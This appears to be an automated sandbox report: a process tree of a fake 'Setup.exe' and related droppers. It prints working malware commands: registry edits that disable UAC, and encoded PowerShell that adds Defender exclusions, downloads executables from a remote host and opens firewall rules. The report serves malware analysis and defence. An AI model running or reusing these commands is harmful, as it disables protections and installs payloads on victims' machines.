                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                    PID:1084
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:2536
                                                                                                                                                                                    • C:\Windows\SysWOW64\more.com
                                                                                                                                                                                      C:\Windows\SysWOW64\more.com
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                      PID:4300
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:1524
                                                                                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5040
                                                                                                                                                                                    • C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe
                                                                                                                                                                                      "C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                      PID:2648
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:1244
                                                                                                                                                                                      • C:\Windows\SysWOW64\more.com
                                                                                                                                                                                        C:\Windows\SysWOW64\more.com
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                        PID:1424
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:2948
                                                                                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:2988
                                                                                                                                                                                      • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap4708:190:7zEvent29762
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1084
                                                                                                                                                                                        • C:\Users\Admin\Downloads\0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
                                                                                                                                                                                          "C:\Users\Admin\Downloads\0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Adds policy Run key to start application
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:2460
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:4068
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • UAC bypass
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              • Modifies registry key
                                                                                                                                                                                              PID:2404
                                                                                                                                                                                          • C:\ProgramData\BraveShared\BraveSharedUpdater.exe
                                                                                                                                                                                            "C:\ProgramData\BraveShared\BraveSharedUpdater.exe"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Adds policy Run key to start application
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                            PID:3772
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:2180
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • UAC bypass
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                • Modifies registry key
                                                                                                                                                                                                PID:4560
                                                                                                                                                                                            • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                                                                                                                                                              "c:\program files (x86)\internet explorer\iexplore.exe"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Adds policy Run key to start application
                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                              PID:2344
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:3716
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • UAC bypass
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  • Modifies registry key
                                                                                                                                                                                                  PID:3288
                                                                                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                svchost.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:4736
                                                                                                                                                                                                • C:\ProgramData\BraveShared\BraveSharedUpdater.exe
                                                                                                                                                                                                  "C:\ProgramData\BraveShared\BraveSharedUpdater.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:4524
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:5288
                                                                                                                                                                                                      • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                                                                                                                                                                        "c:\program files (x86)\internet explorer\iexplore.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:5252
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:5072
                                                                                                                                                                                                      • C:\ProgramData\BraveCrashHandler.exe
                                                                                                                                                                                                        "C:\ProgramData\BraveCrashHandler.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:1076
                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                          cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4DYKHXVC.bat" "C:\ProgramData\BraveCrashHandler.exe" "
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:5048
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAGkAZgAoAC0ATgBvAHQAIAAkACgAJAAoAHcAaABvAGEAbQBpACkAIAAtAGUAcQAgACIAbgB0ACAAYQB1AHQAaABvAHIAaQB0AHkAXABzAHkAcwB0AGUAbQAiACkAKQAgAHsACgAgACAAIAAgACQASQBzAFMAeQBzAHQAZQBtACAAPQAgACQAZgBhAGwAcwBlAAoACgAgACAAIAAgAGkAZgAgACgALQBOAG8AdAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQAgAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAPQAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAAYAAiACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4AUABhAHQAaAAgACsAIAAiAGAAIgAgACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAFUAbgBiAG8AdQBuAGQAQQByAGcAdQBtAGUAbgB0AHMACgAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAUABvAHcAZQByAFMAaABlAGwAbAAuAGUAeABlACAALQBWAGUAcgBiACAAUgB1AG4AYQBzACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlAAoAIAAgACAAIAAgACAAIAAgAEUAeABpAHQACgAgACAAIAAgAH0ACgAKACAAIAAgACAAJABwAHMAZQB4AGUAYwBfAHAAYQB0AGgAIAA9ACAAJAAoAEcAZQB0AC0AQwBvAG0AbQBhAG4AZAAgAFAAcwBFAHgAZQBjACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIAAnAGkAZwBuAG8AcgBlACcAKQAuAFMAbwB1AHIAYwBlACAACgAgACAAIAAgAGkAZgAoACQAcABzAGUAeABlAGMAXwBwAGEAdABoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAPQAgACIAIAAtAGkAIAAtAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIABgACIAIgAgACsAIAAkAE0AeQBJAG4AdgBvAGMAYQB0AGkAbwBuAC4ATQB5AEMAbwBtAG0AYQBuAGQALgBQAGEAdABoACAAKwAgACIAYAAiACAAIgAgACsAIAAkAE0AeQBJAG4AdgBvAGMAYQB0AGkAbwBuAC4AVQBuAGIAbwB1AG4AZABBAHIAZwB1AG0AZQBuAHQAcwAgAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAHAAcwBlAHgAZQBjAF8AcABhAHQAaAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAKACAAIAAgACAAIAAgACAAIABlAHgAaQB0AAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgAH0ACgAKAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAJABJAHMAUwB5AHMAdABlAG0AIAA9ACAAJAB0AHIAdQBlAAoAfQAKAAoANgA3AC4ALgA5ADAAfABmAG8AcgBlAGEAYwBoAC0AbwBiAGoAZQBjAHQAewAKACAAIAAgACAAJABkAHIAaQB2AGUAIAA9ACAAWwBjAGgAYQByAF0AJABfAAoAIAAgACAAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgAkACgAJABkAHIAaQB2AGUAKQA6AFwAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKACAAIAAgACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACIAJAAoACQAZAByAGkAdgBlACkAOgBcACoAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKAH0ACgA=
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:2240
                                                                                                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                  "C:\Windows\system32\chcp.com" 65001
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:2688
                                                                                                                                                                                                                  • C:\Windows\system32\whoami.exe
                                                                                                                                                                                                                    "C:\Windows\system32\whoami.exe"
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:4848
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAZgBpAGwAZQBzAFQAbwBDAGgAZQBjAGsAIAA9ACAAQAAoAAoAIAAgACAAIABAAHsAUABhAHQAaAA9ACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAOwAgAFUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBqAGMAMQAuAHYAdQBsAHQAcgBvAGIAagBlAGMAdABzAC4AYwBvAG0ALwBjAGYAYwBiADYAOQBmAGYALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgA7ACAAVQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwBzAGoAYwAxAC4AdgB1AGwAdAByAG8AYgBqAGUAYwB0AHMALgBjAG8AbQAvAGMAZgBjAGIANgA5AGYAZgAvAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiADsAIABVAHIAbAA9ACIAaAB0AHQAcABzADoALwAvAHMAagBjADEALgB2AHUAbAB0AHIAbwBiAGoAZQBjAHQAcwAuAGMAbwBtAC8AYwBmAGMAYgA2ADkAZgBmAC8ARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgA7ACAAVQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwBzAGoAYwAxAC4AdgB1AGwAdAByAG8AYgBqAGUAYwB0AHMALgBjAG8AbQAvAGMAZgBjAGIANgA5AGYAZgAvAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoACQBAAHsAUABhAHQAaAA9ACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAuAGUAeABlACIAOwAgAFUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBqAGMAMQAuAHYAdQBsAHQAcgBvAGIAagBlAGMAdABzAC4AYwBvAG0ALwBjAGYAYwBiADYAOQBmAGYALwBTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgB9AAoAKQAKAAoAZgBvAHIAZQBhAGMAaAAgACgAJABmAGkAbABlACAAaQBuACAAJABmAGkAbABlAHMAVABvAEMAaABlAGMAawApACAAewAKACAAIAAgACAAaQBmACAAKAAtAE4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQAuAFAAYQB0AGgAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQApACAAewAKACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAGYAaQBsAGUALgBVAHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgBpAGwAZQAuAFAAYQB0AGgACgAgACAAIAAgAH0ACgAgACAAIAAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAZgBpAGwAZQAuAFAAYQB0AGgAKQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoAfQAKAAoAJABhAGQAZABpAHQAaQBvAG4AYQBsAEYAaQBsAGUAcwBUAG8ASABpAGQAZQAgAD0AIABAACgACgAJACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACwACgAJACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAbQB5AHMAdAAtAGwAYQB1AG4AYwBoAGUAcgAtAGEAbQBkADYANAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABtAHkAcwB0AC0AbABhAHUAbgBjAGgAZQByAC0AYQBtAGQANgA0AC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiACwACgAJACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIACgApAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGYAaQBsAGUAUABhAHQAaAAgAGkAbgAgACQAYQBkAGQAaQB0AGkAbwBuAGEAbABGAGkAbABlAHMAVABvAEgAaQBkAGUAKQAgAHsACgAgACAAIAAgAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAUABhAHQAaAAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAAewAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZgBpAGwAZQBQAGEAdABoACkALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACAAIAAgACAAfQAKAH0ACgAKACQAYQBkAGQAaQB0AGkAbwBuAGEAbABGAG8AbABkAGUAcgBzAFQAbwBIAGkAZABlACAAPQAgAEAAKAAKAAkAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAFAAcgBpAHYAYQB0AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AYgBpAG4AIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AbgBvAGQAZQAiAAoAKQAKAAoAZgBvAHIAZQBhAGMAaAAgACgAJABmAGkAbABlAFAAYQB0AGgAIABpAG4AIAAkAGEAZABkAGkAdABpAG8AbgBhAGwARgBvAGwAZABlAHIAcwBUAG8ASABpAGQAZQApACAAewAKACAAIAAgACAAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBQAGEAdABoACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACAAewAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZgBpAGwAZQBQAGEAdABoACkALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACAAIAAgACAAfQAKAH0ACgA=
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                    PID:848
                                                                                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                      "C:\Windows\system32\chcp.com" 65001
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:2944
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell.exe -exec bypass -enc c h c p   6 5 0 0 1 
 $ P r o g r e s s P r e f e r e n c e   =   ' S i l e n t l y C o n t i n u e ' 
 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   C u r r e n t U s e r   B y p a s s   - F o r c e 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   L o c a l M a c h i n e   B y p a s s   - F o r c e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " M i c r o s o f t   E d g e "   - D i s p l a y N a m e   " M i c r o s o f t   E d g e "   - G r o u p   " M i c r o s o f t   E d g e "   - P r o g r a m   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " M i c r o s o f t   E d g e   E U L A "   - D i s p l a y N a m e   " M i c r o s o f t   E d g e   E U L A "   - G r o u p   " M i c r o s o f t   E d g e   E U L A "   - P r o g r a m   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
